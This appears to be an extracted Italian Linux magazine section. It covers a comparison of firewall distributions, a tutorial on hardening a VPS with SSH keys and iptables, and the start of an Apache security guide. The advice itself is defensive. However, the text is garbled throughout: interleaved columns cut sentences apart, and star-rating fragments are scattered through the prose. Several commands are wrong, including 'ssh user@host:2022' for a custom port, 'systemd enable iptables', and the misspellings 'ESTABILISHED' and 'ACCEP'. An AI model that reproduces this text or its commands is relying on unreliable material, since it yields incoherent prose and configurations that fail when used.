costante. IPFire utilizza Pakfire, sicurezza, servizi, utility e via dicendo.
un ottimo programma per la gestione Al loro interno trovate svariate
dei pacchetti che rende semplice applicazioni tra cui Asterisk,
e veloce l’aggiornamento della distro. Dansguardian, FreeRadius2, Snort,
pfSense include un componente che Squid e altre. La distro è configurata
può essere utilizzato per installare per installare automaticamente
nuove versioni
del firmware
e include una
serie di strumenti
diagnostici che
consentono di
risolvere eventuali
problemi
di funzionamento
e installazione.
OPENsense,
da questo punto
di vista, non è alla
pari del proprio
OPNSense visualizza i vari server firewall e permette genitore. Infatti,
di salvare la configurazione di ciascun componente seppure il gestore
pacchetti sia piuttosto flessibile, non
gode della stessa quantità di risorse
di quello presente in pfSense.
In Sophos UTM non c’è alcuna
opzione per la gestione dei
componenti. Viene tutto incluso nella
prima installazione. Trovate utility
come Up2Date che sovrintende
all’installazione degli aggiornamenti
per il firmware del firewall, nonché
per il recupero dei modelli più recenti Verdetto
di antivirus e IPS. Con Untangle
IPFire
è necessario utilizzare the2interface HHHHH
per recuperare qualsiasi elemento OPNsense
accessorio. In questo contesto, HHHHH
l’applicazione Reports si dimostra pfSense
molto utile: prepara rapporti
HHHHH
Sophos UTM
dettagliati e visivamente accattivanti HHHHH
su tutto ciò che il server sta facendo. Untangle NG
Niente vi vieta di aggiornare Firewall
e installare nuove funzioni. Potete HHHHH
configurare il firewall per procedere In questo
round tutte
con gli update in modo automatico.
le distro si
Basta accedere all’interfaccia Web somigliano.
e agire sulla voce dedicata.

Interfaccia di gestione
L’ambiente è intuitivo?

I
PFire è basato su Linux From
Scratch che ha preso in prestito
l’interfaccia di IPCop. L’ambiente
ha un layout semplice e intuitivo, con
diverse voci raggruppate nella parte
superiore. Nella scheda Sistema
trovate le opzioni che influenzano
l’installazione. Qui è presente il menu
per abilitare l’accesso SSH e creare
una ISO di backup con o senza i file
di log. La scheda Stato fornisce una
panoramica sui vari componenti,
mentre Servizi consente di abilitare
e configurare i singoli applicativi.
La console di pfSense è più
dettagliata rispetto a IPFire, tuttavia,
ha più o meno lo stesso layout.
I menu a discesa della funzione
Firewall definiscono le regole
di filtraggio. Le impostazioni per gli
altri servizi, come la gestione della
banda o il captive portal, sono stati
inseriti sotto Services. VPN è il menu
che sovrintende all’omonima
opzione e consente
di configurare nel dettaglio
i vari aspetti relativi all’uso
di una Virtual Private Network.
Sophos UTM sfrutta
un’interfaccia di tipo
dashboard. Tra le altre
informazioni, visualizza un Verdetto
report delle minacce che il
IPFire
firewall ha bloccato nell’arco
HHHHH
delle ultime 24 ore. È inoltre OPNsense
possibile utilizzare la casella HHHHH
di ricerca per restringere pfSense
l’elenco degli strumenti. HHHHH
Untangle è l’unica distro che permette
Sophos UTM
OPNsense ha una GUI più di eseguire l’installazione supportata HHHHH
raffinata rispetto a pfSense. da un’interfaccia grafica in piena regola Untangle NG
Per alcuni aspetti, così come Firewall
IPFire, anche questa distro richiama superiore dell’interfaccia. Untangle HHHHH
apertamente a IPCop. Il layout sfrutta un ambiente grafico moderno Tutte le
è ordinato in modo logico. Le funzioni e ben sviluppato. Ogni applicazione distribuzioni
hanno interfacce
del firewall sono sistemate in una ha un proprio set di impostazioni ben organizzate.
serie di schede disposte nella parte che può essere gestito singolarmente.

82
 Un muro anti-intrusioni

Distro firewall

Il verdetto
U
sare una distro server anziché
un’altra si riduce molto spesso
a una questione di preferenze
personali. Nonostante i risultati
delle prove, la raccomandazione
che facciamo è di non sentirvi troppo
influenzati dai nostri giudizi.
Tutte le piattaforme funzionano
egregiamente e sono adatte a tenere
fuori dalla porta potenziali attacchi.
Ciò che può fare la differenza rispetto
a un utilizzo, può non essere importante
per un altro. Nello scegliere, quindi,
sentitevi liberi di seguire le vostre
esigenze. L’unica distro che non
ci sentiamo di suggerire è Untangle.
Il giudizio non è dovuto a una
presupposta inferiorità tecnica, quanto
più alla possibilità di utilizzare le stesse
funzioni con alternative del tutto
gratuite. La maggior parte delle
applicazioni presenti in Untangle
1° Sophos UTM  HHHHH
Web: www.sophos.com Licenze: Varie Versione: 9.4
Sfrutta un ambiente grafico ben fatto e una vasta raccolta di funzioni.
è disponibile in versione di prova per
soli 14 giorni. Anche gli altri componenti
a pagamento non sono unici.
Le soluzioni a costo zero ne ricalcano
le potenzialità. pfSense è una
piattaforma perfetta per gli smanettoni. Sophos UTM Home Edition è più che sufficiente
Le sue opzioni possono essere estese per soddisfare le configurazioni SOHO
con molteplici strumenti. Tuttavia,
a meno di non essere abituati alle distro e veloce. La GUI contribuisce a rendere
basate su FreeBSD, rischiate di rimanere facile anche la configurazione dei diversi
frastornati dalla miriade di voci. componenti. Il primo posto, tuttavia,
OPNsense punta invece su un approccio lo assegniamo a Sophos UTM che
più adatto ai neofiti. L’interfaccia può essere utilizzato gratuitamente
è gradevole e i componenti principali per gestire una rete con massimo 50
sono stati riscritti. IPFire ha un indirizzi IP. Gli strumenti sono tanti
impressionante elenco di caratteristiche. e molti in uso nella versione Enterprise.
Segnaliamo il suo
sistema di gestione
pacchetti Pakfire
“Sophos ha un elenco eccezionale
che aiuta ad
aggiornare la distro
di funzioni, molte delle quali sono
in modo semplice presenti anche nella versione Pro”
4° pfSense  HHHHH
Web: www.pfsense.org Licenza: ESF Versione: 2.3.2
Tante funzioni ordinate in una GUI troppo arcaica.

2° IPFire  HHHHH 5° Untangle NG Firewall  HHHHH

Web: www.ipfire.org Licenza: GPL Versione: 2.19 Full Core 103 Web: www.untangle.com Licenze: Varie Versione: 12.1.0
È una distro modulabile. Ha un’interfaccia intuitiva e funzionale. La versione gratuita è poco più di una demo per la release a pagamento.

3° OPNsense  HHHHH A voi la parola...

Web: https://opnsense.org Licenza: BSD Versione: 16.7 Non siete d’accordo con le nostre scelte? Avreste usato altre distro?
Tutti i vantaggi di pfSense con una grafica alla portata di tutti. Inviate le vostre opinioni su questo confronto a: recensioni@linuxpro.it

Considerate anche...
Due tra le distro firewall più popolari che
non abbiamo incluso in questo confronto
sono SmoothWall Express e IPCop.
Entrambe hanno avuto un rilascio stabile
parecchio tempo fa. Tuttavia IPCop viene
ancora sviluppato in modo attivo. Stando
alle indicazioni del suo team, a breve
dovrebbe uscire una nuova versione.
Tra le altre soluzioni da consigliare,
citiamo Endian Firewall e Zeroshell
router firewall. Da non dimenticare
ClearOS e Zentyal che, pur essendo
server gateway, vengono utilizzati anche
come firewall. Se siete amanti del fai da
te, potete realizzare il vostro firewall con
pochi sforzi. Sfruttate una piattaforma
ARM o un Raspberry Pi, montandovi
poi iptables. Per aiutarvi nella gestione
delle regole, fatevi dare una mano
da un’interfaccia grafica intuitiva
come quella messa a disposizione
da Shorewall. In alternativa, per
la configurazione di iptables, valutate
l’uso di UFW con la GUI di Gufw.

83
 Sicurezza di rete

Configurare
un VPS sicuro

Il mondo della segretezza dei dati ha attualmente un tema molto

caldo: la sicurezza dei server virtuali. Ecco come garantirla

I
server virtuali sono economici. In effetti, L’esempio più diffuso è OpenVZ (Open gira in un OS convenzionale. I puristi, tuttavia,
se non avete troppe richieste, potete Virtuozzo), un kernel Linux modificato ribattono che non è una vera virtualizzazione,
ottenerne uno gratuitamente da Amazon condiviso tra tutti gli OS guest (OpenVZ ma una containerizzazione, essendo più vicina
e avere il vostro server virtuale alla supervisione di ambienti
è un ottimo modo per capire
le responsabilità, i trabocchetti
“La parola ‘Ipervisore’ deriva dal in chroot che a OS effettivi.
Incidentalmente l’etimologia
e i vantaggi associati all’amministrazione
remota della vostra box in rete, senza
fatto che i sistemi operativi una dietro la parola ipervisore
è in relazione al fatto che
preoccuparvi di hardware fallace volta erano definiti ‘supervisori’” i sistemi operativi una volta
e fatture esorbitanti. Eccetto il livello erano definiti ‘supervisori’:
gratuito di Amazon, le macchine virtuali (VM) supporta solo guest Linux, ma perché dovreste un ipervisore è dunque un supervisore
più economiche girano su una cosa conosciuta volere altro?). OpenVZ è quasi un esempio di supervisori. Se avete bisogno di un livello più
come tecnologia di virtualizzazione a livello OS. di ipervisore in host (tipo 2) dal momento che elevato di isolazione, dovreste dirigere le vostre

84
 Server virtuali protetti
attenzioni verso un ipervisore di tipo 1, come VMWare o Xen.
Questo modello permette agli OS guest di usare i propri kernel
così da usare il sistema preferito. L’ipervisore stesso è minimale
e gestisce tutto il dialogo con l’hardware a basso livello. Per
essere di una qualunque utilità agli OS guest, sopra all’ipervisore
deve girare un control domain (dom0), ovvero una VM
privilegiata ove gira un kernel abilitato a Xen che gestisce tutti
i guest non privilegiati e offre loro un’interfaccia per l’hardware.
Il kernel Linux supporta Xen, ma potete anche usare NetBSD
o OpenSolaris come stack di controllo. Si dovrebbe anche
menzionare KVM, che fa un eccellente lavoro nel confondere
i limiti tra Tipo 1 e Tipo 2. Una volta caricato il modulo KVM, l’OS
host diventa un ipervisore utilizzabile da un virtualizzatore (come
Qemu) per lanciare un qualsiasi OS compatibile con
l’architettura della CPU. Qemu può virtualizzare x86, PowerPC
e S/390, sebbene emulare architetture diverse abbia un impatto
nelle performance. I guest ricadono in due categorie.
Paravirtualizzazione (PV): richiede un kernel abilitato a PV
così che il guest sappia che sta girando su hardware virtuale.
Virtualizzazione assistita dall’hardware (HVM):
controparte completa della paravirtualizzazione, richiede una
CPU con estensioni per la virtualizzazione che mitighino il costo
in performance associato all’emulazione di BIOS e altro
hardware. Per complicare ulteriormente le cose, i guest Elliptic Curve Crypto è così avanzato che potete generare anche chiavi più corte
completamente virtualizzati possono essere parzialmente (256, 384 e 521 bit al posto di 1024, 2048, 3072 o 4096 per RSA)
paravirtualizzati attraverso driver PV-on-HVM, per accelerare
l’I/O e introdurre delle aree grigie. Qualunque sia il percorso
scelto, dopo un pagamento con carta di credito rapido e indolore Mettere in sicurezza
vi sarà fornito un hostname/indirizzo IP e una password. la shell sicura
Ora potrete entrare con ssh nella vostra nuova appliance Anche se avete una buona memoria e una password sicura,
con accesso completo di root: è buona regola fare un passo in più e creare una coppia
$ ssh root@nomemacchina di chiavi per autenticarvi con ssh, disabilitando al contempo
Ci sono un paio di cose delle quali dovreste subito occuparvi, le password. La chiave pubblica è memorizzata sul server
esattamente come fate appena installato un OS su una e dovreste tenere quella privata in luogo sicuro, senza farne
macchina fisica. Alcune di queste potrebbero essere già state alcuna copia. Se la perdete, la maggior parte dei VPS
fatte, a seconda della cura messa nel prepararvi l’immagine vi permetterà di entrare con una console seriale e sistemare
che state usando. Controllate /etc/hostname, /etc/locale. le cose. Potete generare una coppia di chiavi sulla macchina
gen, /etc/hosts e impostate le timezone. Talvolta la cosa locale con il comando
migliore è impostarla a UTC in modo che benefici della natura $ ssh-keygen
virtuale del sistema: Vi verrà chiesto un nome di file per la chiave privata, e quindi
$ ln -sf /usr/share/zoneinfo/UTC /etc/localtime una passphrase. Se pensate di avere molte chiavi diverse
Ora dovreste creare un utente normale, dal dato che essere per diversi server potrebbe essere una buona idea cambiare
sempre root non è una buona idea: il nome del file proposto per includere l’hostname relativo;
$ useradd -m -G wheel nomeutente in caso contrario, ~/.ssh/id_rsa va benissimo. La chiave
Sostituite nomeutente con il vostro nick preferito. Con questo pubblica verrà generata nello stesso punto con suffisso .pub.
comando vi siete aggiunti al gruppo wheel, il che vi permette Notate l’immagine casuale associata alla chiave: potrebbe
di usare su per diventare root. Se volete usare sudo, la parte tornarvi utile nel confrontare chiavi diverse. Per default ssh-
-G wheel non è necessaria, dovrete però usare visudo. keygen produce chiavi RSA a 2048 bit, dovrebbero essere

Avvertimento
Server VPS economici non sono una buona idea
per operazioni mission-critical o per memorizzare
dati sensibili. In questa guida avete visto cosa potete
fare per irrobustire le installazioni, ma non
vi renderà inattaccabili. Il primo avviso è di non
lanciare servizi di cui non avete bisogno
e aggiornare tutto regolarmente. C’è sempre una
possibilità di violazione. Ci sono punti deboli
al di fuori della VM stessa: un exploit a livello kernel
di un setup OpenVZ può compromettere qualsiasi
macchina virtuale vi giri sopra, oppure potrebbe
esserci una vulnerabilità nel pannello di controllo
del vostro provider o in una qualsiasi altra
infrastruttura. Siate anche consapevoli che
in questo settore ci sono molti speculatori, alcuni
sovraccaricano le appliance in diversi livelli
di rivenditori. Alcuni hanno siti accattivanti ma poca
competenza. Leggete le recensioni e ricordate
il vecchio adagio: se qualcosa è troppo bello
per essere vero, probabilmente non lo è.
Non aspettatevi altresì troppo aiuto: dovrete
effettuare da soli reinstallazioni e reboot da cPanel
o da SolusVM. Anche se la maggior parte dei
provider ha un sistema di ticketing per il supporto
tecnico, vi aiuterà perlopiù lato hardware e OS.
Non aspettatevi che vi spieghino perché il vostro
script PHP è lento o come configurare Apache.

85
 Sicurezza di rete
Ecco AWStats. Grafici. Immediatezza. Wow!
sufficienti anche per i più paranoici. Esistono diverse opzioni,
tuttavia, e potete generare anche una coppia a 521 bit
Elliptic Curve con
$ ssh-keygen -t ecdsa -b 521
Potete quindi copiare la chiave sul server:
ssh-copy-id nomeutente@nomemacchina
Sostituite ovviamente l’utente e la macchina
con l’utente creato in precedenza e l’indirizzo
del vostro VPS. Il comando aggiungerà la chiave
pubblica al file ~/.ssh/authorized_keys sul server
remoto. Se dovete copiare manualmente la chiave
privata, ricordatevi che i permessi devono essere
600, altrimenti ssh non la considererà. Ora potete
provare la vostra nuova chiave: se avete
mantenuto il nome del file di default non vi serve alcuna sintassi
speciale, altrimenti dovrete usare l’opzione -i (identity file):
$ ssh -i ~/.ssh/private_key nomeutente@nomemacchina
Lockdown completo
Filtrare i pacchetti in uscita è realmente solo per paranoici, ma se lo volete qui
c’è un piccolo riassunto del traffico che probabilmente vorrete permettere prima
della cara vecchia regola REJECT.
Traffico
Analogo alle regole in entrata, usate -o lo -j ACCEPT
loopback
DNS TCP e UDP sulla porta 53
NTP UDP porta 123
HTTP(S) TCP sulle porte 80 e 443
TCP sulla porta 21 (l’FTP attivo inizierà una connessione in entrata dalla
FTP porta 20 del server, ma dovrebbe occuparsene la regola estabilished/
related della chain INPUT)
git TCP porta 9418
ping CMP usate --icmp-type 8 (echo) come nelle regole in entrata
Se volete veramente raggiungere lo stereotipo del sysadmin con la mania del controllo,
è possibile registrare tutti i pacchetti che iptables rifiuta, ma potrebbe portarvi in men che
non si dica a file di log enormi e dischi pieni, il che potrebbe rappresentare un problema
più di qualcuno che scansioni la vostra macchina alla ricerca di share SMB inesistenti.
86
Se tutto va secondo i piani, dovrebbe venirvi richiesta
la passphrase della chiave privata e quindi consentito il login.
Fatto questo potete modificare sshd_config del server
disabilitando l’autenticazione via password, il protocollo v1
e il login tranne quello di nomeutente; opzionalmente potete
cambiare la porta da quella di default (22):
Port 2022
Protocol 2
PasswordAuthentication no
AllowUsers nomeutente
È il momento del restart del server SSH. Se usate gli script
Sysvinit è solo questione di diventare root e lanciare
il comando:
$ /etc/init.d/sshd restart
oppure per Systemd
$ systemctl restart sshd
Ora solo le persone in possesso del vostro file di chiave
possono entrare. Il server gira altresì su una porta diversa,
che può scoraggiare alcuni attaccanti della prim’ora,
ma implica anche che dovete indirizzare adeguatamente
il vostro client:
$ ssh nomeutente@nomemacchina:2022
Potete usare ssh-agent per mantenere la chiave sbloccata
per la durata della sessione locale, molto comodo seppure
“Vale la pena considerare
il tunneling di tutti i servizi
lanciati esplicitamente per voi
su una connessione SSH”
al costo di un po’ di privacy. Lanciate
$ ssh-add ~/.ssh/private_key
Se è in esecuzione una qualche forma di Desktop
Environment (oppure se avete comunque in azione Gnome
Keyring o simili) potete anche sbloccare automaticamente e
caricare le vostre chiavi in memoria al login. Ancora: comodo
ma insicuro. Vale la pena considerare il tunneling di tutti i
servizi lanciati esplicitamente per voi su una connessione SSH.
Per esempio, se state facendo girare un server VNC, invece
di esporlo al mondo, configuratelo per ascoltare solamente
sull’indirizzo locale di loopback. La porta standard per VNC
è la 5900, quindi quando usate ssh potete farne il forwarding
alla 5901 con:
$ ssh -L 5901:localhost:5900 nomeutente@
nomemacchina:2022
La parte dopo i primi due punti è relativa alla macchina
remota: state facendo il forwarding della 5900 remota alla
5901 locale. Ammesso che l’alias localhost sia corretto nel file
hosts del server, potete ora connettere il client VNC alla porta
5901 della macchina locale (o display :1 in gergo VNC).
Se tutto va bene, dovreste avere una sessione VNC
funzionante e la calda sensazione di benessere nel sentire
i vostri click passare su un canale crittato.
Giocare con il fuoco
Impostare un firewall basato su iptables è la vostra prossima
sfida. Il programma iptables filtra i pacchetti in base a regole
inserite in una tabella chiamata filters e raggruppate in tre
 Server virtuali protetti
chain: INPUT per i pacchetti in entrata, OUTPUT per quelli
in uscita e FORWARD per il routing avanzato, che non
dovrebbe preoccuparvi ora (così come le altre tabelle, mangle
e nat). Ogni chain ha una policy predefinita, che è solitamente
accettare tutti i pacchetti. Oltre ad accettarli avete il target
REJECT per rifiutare la connessione esplicitamente e DROP
per ignorare in silenzio i pacchetti. Quest’ultimo è ottimo
per evitare l’individuazione, ma pessimo per diagnosticare
problemi. Potete vedere le regole correnti di iptables con
il seguente comando da root:
$ iptables -L
Cominciate con un foglio bianco eliminando tutte le regole
in essere e tutte le chain extra:
$ iptables -F
$ iptables -X
Sebbene chiudere tutto sia una gran tentazione (e peraltro
un firewall troppo permissivo non è una buona idea), vi farà
gioco permettere il passaggio di pacchetti per la connessione
e per il filtraggio. Dopotutto sarebbe molto imbarazzante
chiudervi fuori dalla vostra stessa macchina.
Le vostre prime regole gestiscono il traffico sull’interfaccia
locale. Molti programmi parlano tra di loro in questo modo,
ma non dovete permettere che il traffico dal mondo esterno Con il logging abilitato potete vedere tutto il rumore di fondo che
arrivi su l/O. La terza regola ammette tutte le connessioni già generalmente viene semplicemente ignorato
stabilite e tutte quelle successive: questo dovrebbe
risparmiarvi qualche colpo al cuore, dal momento che
vorrete far passare i pacchetti dai servizi ai quali vi state gli altri pacchetti in entrata:
connettendo. $ iptables -A INPUT -j REJECT
$ iptables -A INPUT -i lo -j ACCEPT Le regole per ogni chain vengono processate in sequenza,
$ iptables -A INPUT ! -i lo -d 127.0.0.0/8 -j REJECT quindi tutti i pacchetti che non corrispondono alle regole
$ iptables -A INPUT -m state --state ESTABILISHED, precedenti vengono rifiutati. Salvate le regole di iptables
RELATED -j ACCEPT e assicuratevi che vengano ripristinate al reboot: come farlo
L’opzione -A indica di aggiungere la regola alla chain di input esattamente dipende dal sistema di init della vostra
in modo che venga processata dopo le altre già presenti.
Potete anche usare -I INPUT 1 per inserire la regola in cima
alla chain. È carino anche abilitare il server ad accettare “DROP è ottimo per evitare
e rispondere alle richieste di ping con:
$ iptables -A INPUT -p icmp -m icmp --icmp-type 8 -j l’individuazione ma pessimo
ACCEPT
E se state facendo girare un server Web vorrete permettere
per diagnosticare problemi”
il traffico http e https:
$ iptables -A INPUT -p tcp --dport 80 -j ACCEPT distribuzione. Per alcune il comando iptables-save stampa
$ iptables -A INPUT -p tcp --dport 443 -j ACCEP le regole attuali in stdout, e con Systemd iptables.service
Ora dovrebbe essere effettivamente sicuro rifiutare tutti carica le regole da /etc/iptables/iptables.rules, quindi
il seguente comando farà allo scopo:
$ iptables-save > /etc/iptables/iptables.rules
$ systemd enable iptables
In Debian il metodo standard è salvare le regole come sopra
e creare il file /etc/network/if-pre-up.d/iptables con
#! /bin/sh
/sbin/iptables-restore < /etc/iptables/iptables.rules
Con questo si conclude la lezione di oggi. Si spera che
le chance di essere vittima di attacchi siano diminuite:
il provider del vostro VPS approverebbe. Ora, perché
non metter su un sempliceNginx o un Lighttpd?
E configurarli poi per offrire statistiche sull’utilizzo con
l’ottimo AWStats? O forse impostare un blog con Ghost.
Avere la vostra cartella Dropbox sul server è utile, a volte,
ma d’altra parte potrebbe essere rischioso: qualunque cosa
Se non volete impazzire, non cercate di capire la struttura facciate, tenete presente la sicurezza e, doveste venir bucati,
di pricing per le istanze EC2 di Amazon prendete e ricominciate da capo.

87
 Sicurezza di rete
Garantire
la sicurezza
Ecco in che modo Apache può essere utilizzato per ospitare pagine
Web davvero sicure con qualche semplice accorgimento...
I
l venerando server HTTP Apache è considerato il nonno
dei Web server, anche se ha soltanto 20 anni. Di recente
abbiamo esaltato le virtù dei Web server più recenti e vivaci
(in particolare Nginx, ma anche LiteSpeed e Lighttpd),
Apache però sin dal lontano 1996 è il Web server più usato
al mondo. Certo, se state eseguendo un semplice sito Web
probabilmente Nginx può distribuire le vostre pagine
impiegando qualche nanosecondo in meno, ma a meno che
il vostro non sia un sito estremamente famoso non noterete
alcuna differenza. Confrontato con Nginx, Apache può
sembrare un po’ macchinoso o addirittura spaventoso per via
dei suoi file di configurazione e della miriade di moduli.
In questo tutorial, cercheremo di semplificare le cose: una volta
coperte le basi, ci concentreremo su alcuni aspetti legati alla
sicurezza e alla privacy. Questi argomenti potranno non essere
eccitanti come creare una bella applicazione Web in HTML5,
ma probabilmente sono più utili. Una volta che tutto è installato
e sembra funzionare, fermiamoci per dare uno sguardo molto
semplificato a cosa Apache, e qualsiasi altro Web server,
fa realmente; essendo un server, è in ascolto per le richieste,
ed essendo un server Web, le richieste a cui presta attenzione
sono HTTP o HTTPS; queste richieste possono essere
associate all’indirizzo IP del server oppure a un nome di
dominio che risolve l’indirizzo. Un singolo server può
tranquillamente servire diversi domini (chiamati host virtuali,
Tip
Lo staff di Apache
ha qualcosa da
dire riguardo
alle modifiche
che Debian ha
apportato alla
configurazione
di default. Potete
leggere tutto
all’indirizzo:
http://bit.ly/
Ecco cosa vedrete in Ubuntu se l’installazione è andata
DebianDiffs
(in inglese). a buon fine. Rassicurante, ma bisognerebbe disabilitare
il sito Web di default
88
ne parleremo tra poco), per questo il primo compito per un
Web server è quello di capire a quale host virtuale si riferisce
la parte del dominio dell’URL; a quel punto il server studia il
resto della richiesta HTTP in modo che venga associata alle
corrette risorse locali. Le risorse locali possono essere file
statici, per esempio HTML o immagini, ma possono anche
essere risposte dinamiche generate dal server, come per
esempio degli script Perl o PHP. Nel caso più semplice la
parte dell’URL che segue la prima / corrisponde a una
posizione nel filesystem del server all’interno della directory
associata all’host virtuale corrispondente, per esempio
esempio.it/index.html può diventare /var/www/html/
esempio/index.html; tuttavia non è obbligatorio che il
server Web segua questa regola, è possibile definire delle
regole di riscrittura in modo che la posizione fisica non abbia
nulla a che vedere con il percorso scritto nell’URL. Per i
programmi CGI la situazione è più complicata, ma il principio
è simile, i dati ricevuti dalla richiesta HTTP vengono in
qualche modo inviati a uno script o a un programma che
costruisce l’HTML appropriato, quest’ultimo viene poi
reinviato al server Web che a sua volta lo manda al client.
Aumentare la sicurezza
Esaminando il file di configurazione (riccamente commentato),
potreste notare due cose in particolare: le direttive User
e Group. Quando il demone Apache viene avviato parte come
root, ma una volta letti i file di configurazione vengono invocati
dei sottoprocessi che utilizzano le credenziali specificate
da User e Group; è con questi sottoprocessi che i client
interagiscono, quindi se qualcosa dovesse andare storto
qualsiasi tentativo di manomissione sarà effettuato con
i permessi dell’utente relativo e non come root, il che
è un’ottima cosa. Molti demoni Linux partono in questo modo
perché ci sono alcune attività iniziali che richiedono i privilegi
di root, nel caso di Apache una di queste attività è l’esecuzione
del bind sulla porta 80 (le porte inferiore a 1024 di norma non
sono accessibili ai comuni mortali). Di default Debian, Mint
e Ubuntu eseguono Apache come utente www-data (come
specificato nel file /etc/apache2/envvars che viene letto dal
file di configurazione), altri layout utilizzano invece l’utente
http. È buona regola che l’utente con il compito di eseguire
Apache non abbia possibilità di login e non dovrebbe essere
utilizzato per nient’altro se non eseguire Apache. Come
conseguenza a questa riduzione di permessi tutti i file ai quali
 Server Web

Installazione e test
Giusto per confondere un po’, le diverse distro
hanno scelto nomi diversi per i pacchetti Apache.
Arch Linux sembra avere poca immaginazione
e ha scelto apache, OpenSUSE e le distribuzioni
derivate da Debian hanno preferito apache2
la stirpe di Red Hat invece ha optato per un più
tradizionale httpd. Una volta che avete delegato
il compito al vostro gestore di pacchetti,
vale la pena di dare un’occhiata al file di
configurazione principale (per spaventarvi un po’,
ma contiene anche molte informazioni utili).
Tradizionalmente si trova in /etc/httpd/conf/
httpd.conf che è rispettato da Arch e Fedora,
le distribuzioni Debian-based invece hanno scelto
/etc/apache2/apache2.conf e OpenSUSE
opta per /etc/apache2/httpd.conf. Se non
diversamente indicato nel tutorial ci riferiremo
sempre a un’installazione Mint/Ubuntu. Potete
trovare un riassunto dei vari layout di Apache
nelle varie distribuzioni all’indirizzo https://wiki.
apache.org/httpd/DistrosDefaultLayout.
La struttura (anche se ne la posizione ne il
contenuto) dei file di configurazione di Apache
è simile tra le varie distribuzioni, e anche se la
configurazione iniziale cambia, di solito dopo
l’installazione è pronta all’uso. Una volta avviato
il servizio con
$ sudo service apache2 start
potete navigare all’indirizzo http://localhost
e, se tutto va come dovrebbe, vedrete una
rassicurante pagina iniziale. Altre distribuzioni
potrebbero mostrare una directory vuota, che
comunque dovrebbe rassicurarvi. Potete inserire
il vostro file index.html personale nella directory
/var/www/html/ o /srv/http in Arch Linux
se volete mostrare qualcosa di diverso.

volete che Apache acceda devono essere accessibili da www- $ sudo a2dismod status
data. Allo stesso modo, qualunque directory che ospiti dei
contenuti ai quali volete accedere deve essere sia leggibile sia
È necessario riavviare il demone Apache perché le modifiche
abbiano effetto. Se invece decidiamo di voler indietro le nostre
Tip
eseguibile da questo utente. Quando si esegue un’applicazione informazioni di stato, ci basterà eseguire:
Se masticate un
Web alcuni file devono poter essere scritti dall’utente www- $ sudo a2enmod status po’ l’inglese potete
data, ma è sempre meglio essere il più conservativi possibile I comandi a2ensite e a2dissite fanno la stessa cosa ma leggere la pagina
con i permessi. Di solito si inizia impostando root come sugli host virtuali; a2enconf e a2disconf invece si sull’HTTPS di
proprietario di tutto ciò che si trova nella directory /var/www occupano delle opzioni di configurazione. Oltre a Robert Heaton
all’indirizzo
impostando i permessi a 755 per tutte le sottodirectory e 644 disabilitare mod_statusn possiamo aggiungere due righe
https://bitly.com/
per i file al loro interno. Se un programma o uno script fallisce a al file /etc/apache2/apache2.conf al fine di non rivelare HTTPSGuide.
causa della necessità di accesso in scrittura a qualche file, si la versione del nostro Apache all’interno di una pagina di
assegnano i permessi necessari a quel particolare file. Una errore o in una richiesta HTTP:
cosa che bisognerebbe sempre evitare è quella di rendere tutti ServerTokens Prod
i file che vengono letti da root durante il setup iniziale (per ServerSignature Off
esempio quello che si trova nella directory /etc/apache2) Di default, se andiamo in una directory che non contiene il file
leggibili da www-data. Ora, con il demone Apache in index.html, o un qualunque altro file specificato dalla direttiva
esecuzione puntate il vostro browser all’indirizzo http:// DirectoryIndex, otterremo un elenco di ciò che contiene la
localhost/server-status. Potrebbe comparirvi una pagina directory sia dei suoi file che delle eventuali sottodirectory.
di errore che vi comunica che la pagina non è stata trovata, Dal punto di vista della sicurezza non è il massimo, vediamo
oppure (se state usando Ubuntu o Mint) potreste vedere come disabilitarlo utilizzando l’opzione Indexes della cartella
un’insieme di informazioni sul vostro server Web e potreste /var/www/. Apriamo quindi il file apache2.conf e nella sezione
chiedervi com’è finita lì questa pagina visto che nella directory appropriata trasformiamo la riga dell’Indexes come segue:
del vostro sito Web (wwwroot) non avete nessun file server- <Directory /var/www/>
status. La risposta è che l’ha creata il modulo mod_status. Options -Indexes
Questa pagina di informazioni è molto utile se si deve
diagnosticare qualche problema di Apache e può sembrare
innocua ma può rivelarsi molto utile anche per i cyber criminali
(termine ormai preferito al più classico hacker). Se non stiamo
utilizzando una distribuzione derivata da Debian, disabilitare
il mod_status si traduce nel rimuovere/commentare la riga
LoadModule status_module modules/mod_status.so
dal file principale di configurazione. Invece, la famiglia Debian
ha introdotto alcuni simpatici script per abilitare e disabilitare
i moduli. All’interno della directory /etc/apache2 possiamo
vedere, tra le altre cose, due directory chiamate mods-
enabled/ e mods-available/. La prima contiene dei link
simbolici che puntano ai contenuti della seconda, tutti i Secondo un
moduli attivi sono linkati qui. Ora ci occuperemo di due link: sondaggio di
status.load e status.conf, il primo contiene la riga vista w3techs.com,
Apache è di gran
sopra (o comunque una riga molto simile), il secondo
lunga il più usato.
contiene la configurazione del modulo. Le cartelle mods-* ci
Nginx lo supera
permettono di mantenere pulito il file di configurazione nei siti a più alto
principale. Questa è un’ottima cosa, quasi quanto la bella traffico, ma molta
suite di script che i ragazzi di Debian offrono per gestire i link gente lo utilizza
simbolici. Per esempio, possiamo disabilitare il modulo mod- come reverse
status semplicemente con: proxy per Apache

89
 Sicurezza di rete
Realtà virtuale
Tip Anche se volete eseguire soltanto un sito Web è comunque
meglio configurarlo come host virtuale, se non altro per
Vale la pena dare mantenere il file di configurazione apache2.conf pulito.
un’occhiata ai log di L’installazione di default di Debian utilizza come setup per
accesso e di errore
l’host virtuale il file 000-default.conf e vi consigliamo di
che si trovano in
/var/log/apache2. darci un’occhiata. Utilizzeremo questo file per gestire due
Al loro interno domini nel nostro server Web. Se non avete accesso a dei
potete vedere chi ha nomi di dominio registrati potete utilizzare il finto suffisso
visto cosa e capire .local per fare i vostri test. Supponiamo che l’ip locale del
se qualcosa non
vostro server Web sia 10.0.1.1 e che vogliate impostare due
funziona.
domini. Vi basterà aggiungere le due righe qui sotto al file
/etc/hosts di una qualsiasi macchina nella vostra rete
(incluso il server stesso) per far sì che questa riesca a
raggiungere il server utilizzando i domini desiderati:
10.0.1.1 lxpWeb1.local
10.0.1.1 lxpWeb2.local
In alternativa potreste utilizzare un provider DNS dinamico
per far puntare al vostro indirizzo IP i nomi di dominio.
In entrambi i casi il prossimo passo è quello di aggiungere le
voci per i vostri siti Web nella directory /etc/apache2/sites-
available/. Copiamo il template di default e modifichiamolo
per i nostri due siti:
$ cd /etc/apache2/sites-available
$ sudo cp 000-default.conf lxpWeb1.conf
$ sudo cp 000-default.conf lxpWeb2.conf
I file dei siti verranno posizionati nelle directory /var/www/
html/lxpWeb1 e /var/www/html/lxpWeb2, creiamo le
due directory e poi aggiungiamo le righe che seguono
